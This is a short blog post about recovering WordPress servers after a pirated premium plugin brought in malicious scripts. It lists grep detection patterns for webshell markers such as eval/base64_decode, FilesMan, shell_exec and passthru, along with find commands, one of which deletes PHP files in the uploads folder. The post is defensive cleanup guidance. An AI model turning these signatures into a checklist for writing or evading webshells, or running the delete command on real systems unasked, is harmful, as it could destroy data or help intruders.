While searching on internet i found a site which provides premium plugin and themes for free. Because of the excitement i just downloaded a woocommerce premium plugin and uploaded directly to our live server through Git. Unfortunately, its was a big mistake. That plugin contains some exploit script.
Nature of the Exploit Script:
I have using Easyengine.io in digitalocean server. Hosted more than 12+ domains. All websites root folder created a some random files and folder and which included some script in some js files. Initially, i can’t find the files which contain this type of script.
Code i tried to find exploit code in wordpress files.
grep '((eval.*(base64_decode|gzinflate|\$_))|\$[0O]{4,}|FilesMan|GLOBALS.*exit|JGF1dGhfc|IIIl|die\(PHP_OS|posix_getpwuid|Array\(base64_decode|document\.write\("\\u00|sh(3(ll|11)))' . -lroE --include=*.php*
grep -Rn “shell_exec *(” /var/www
grep -Rn “base64_decode *(” /var/www
grep -Rn “phpinfo *(” /var/www
grep -Rn “system *(” /var/www
grep -Rn “php_uname *(” /var/www
grep -Rn “chmod *(” /var/www
grep -Rn “fopen *(” /var/www
grep -Rn “fclose *(” /var/www
grep -Rn “readfile *(” /var/www
grep -Rn “edoced_46esab *(” /var/www
grep -Rn “eval *(” /var/www
grep -Rn “passthru *(” /var/www
Check File Permissions:
777 folder permission is one of the dangerous permission. You need to change such files and folder. to check permission use following code.
find / -type f -perm 0777
Right permission for wordpress files is 644 and folder is 755. Check detailed post regarding file permission here.
Check Upload Directory:
In some cases the malicius code will be in wordpress upload directory. Hence check any php files present in this folder. goto your wordpress root directiry and
find . -path "*wp-content/uploads*" -name "*.php"
and delete if any
find . -path "*wp-content/uploads*" -name "*.php" -delete